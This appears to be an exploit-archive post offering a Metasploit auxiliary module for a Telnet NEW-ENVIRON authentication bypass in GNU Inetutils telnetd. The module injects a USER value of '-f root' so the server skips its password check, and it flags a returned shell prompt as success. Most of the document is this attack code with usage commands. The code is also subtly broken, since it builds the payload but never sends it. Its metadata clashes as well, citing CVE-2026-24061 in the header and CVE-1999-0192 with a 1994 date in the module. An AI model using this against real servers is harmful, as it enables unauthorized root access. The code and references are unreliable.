GNU Inetutils 2.7 Telnet Authentication Bypass Scanner

=============================================================================================================================================
| # Title GNU Inetutils 2.7 Telnet Authentication Bypass Scanner

=============================================================================================================================================
| # Title : GNU Inetutils 2.7 Telnet NEW?ENVIRON Authentication Bypass Scanner |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : System built?in component. No standalone download available. |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/214219/ & CVE-2026-24061

[+] Summary : This Metasploit auxiliary scanner detects a Telnet authentication bypass vulnerability related to improper handling of the NEW-ENVIRON option during Telnet negotiation.
The issue allows an attacker to inject a malformed USER environment variable (for example, using flags such as -f root) when the server requests environment variables.
Affected Telnet daemons may incorrectly trust this input, potentially bypassing password authentication and granting immediate shell access.
The module passively listens for the IAC SB NEW-ENVIRON SEND request, then responds with a crafted subnegotiation payload to test whether the target accepts the malicious USER value.
It verifies success by analyzing server responses for common indicators of a successful login or shell prompt. When exploitation indicators are detected,
the module reports the vulnerability in the Metasploit database.
This scanner is intended for security assessment and detection purposes against vulnerable Telnet servers, including implementations such as GNU Inetutils telnetd up to affected versions,
and aligns conceptually with historical NEW-ENVIRON authentication bypass issues (e.g., CVE-1999-0192 and related Telnet environment variable flaws).

[+] Usage :

# View available options

show options

# Set target(s)

set RHOSTS <target_IP_or_range>

# Example: set RHOSTS 192.168.1.1

# Or for a range: set RHOSTS 192.168.1.1-254

# Optional: Change port if Telnet is on non-standard port

set RPORT 2323

# Optional: Adjust timeout (default: 5 seconds)

set TIMEOUT 10

# Optional: Change payload (default: "-f root")

set USER_PAYLOAD "-f admin"

[+] POC :

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
Rank = NormalRanking

include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::Telnet

def initialize(info = {})
super(update_info(info,
'Name' => 'Telnet NEW-ENVIRON Authentication Bypass Scanner',
'Description' => %q{
This module scans Telnet servers for the historical NEW-ENVIRON
authentication bypass vulnerability (CVE-1999-0192).

Vulnerable Telnet daemons may incorrectly process environment
variables supplied during NEW-ENVIRON negotiation. By injecting
a malformed USER value (e.g., "-f root"), authentication checks
may be bypassed.

This module detects and confirms the bypass condition only.
It does NOT execute commands or create a session.
},
'Author' =>
[
'indoushka'
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '1999-0192'],
['RFC', '1572']
],
'DisclosureDate' => '1994-12-12'
))

register_options(
[
Opt::RPORT(23),
OptString.new(
'USER_PAYLOAD',
[
true,
'Malformed USER environment value',
'-f root'
]
),
OptInt.new(
'TIMEOUT',
[
true,
'Timeout for Telnet negotiation (seconds)',
5
]
)
]
)
end

def run_host(ip)
begin
connect
print_status("#{ip}:#{rport} - Connected to Telnet service")

self.sock.telnet_options[:negotiation] = false

new_environ_requested = false

::Timeout.timeout(datastore['TIMEOUT']) do
loop do
data = sock.get_once(-1, 1)
break if data.nil?

if data.include?("\xff\xfa\x27\x01")
new_environ_requested = true
print_good("#{ip}:#{rport} - NEW-ENVIRON request detected")

buf = "\xff\xfa\x27\x00"
buf += "\x00USER"
buf += "\x01"
buf += datastore['USER_PAYLOAD']
buf += "\xff\xf0"

print_status("#{ip}:#{rport} - Sending USER=#{datastore['USER_PAYLOAD']}")

Rex.sleep(1)
response = sock.get_once(-1, datastore['TIMEOUT'])

if response && response =~ /(last login|welcome|login successful|[#\$]>)/i
print_good("#{ip}:#{rport} - AUTHENTICATION BYPASS CONFIRMED")
print_status("#{ip}:#{rport} - Server response: #{response.strip}")

report_vuln(
host: ip,
port: rport,
proto: 'tcp',
name: self.name,
refs: self.references,
info: "Authentication bypass via NEW-ENVIRON (USER=#{datastore['USER_PAYLOAD']})"
)
else
print_status("#{ip}:#{rport} - Payload sent, but bypass not confirmed")
end

break
end
end
end

unless new_environ_requested
print_error("#{ip}:#{rport} - NEW-ENVIRON was not requested (likely not vulnerable)")
end

rescue ::Timeout::Error
print_error("#{ip}:#{rport} - Timeout during Telnet negotiation")
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::EOFError
print_error("#{ip}:#{rport} - Server closed the connection")
rescue ::Interrupt
raise
rescue ::Exception => e
print_error("#{ip}:#{rport} - Unexpected error: #{e.class} - #{e.message}")
ensure
disconnect
end
end
end


Greetings to :============================================================
jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|
==========================================================================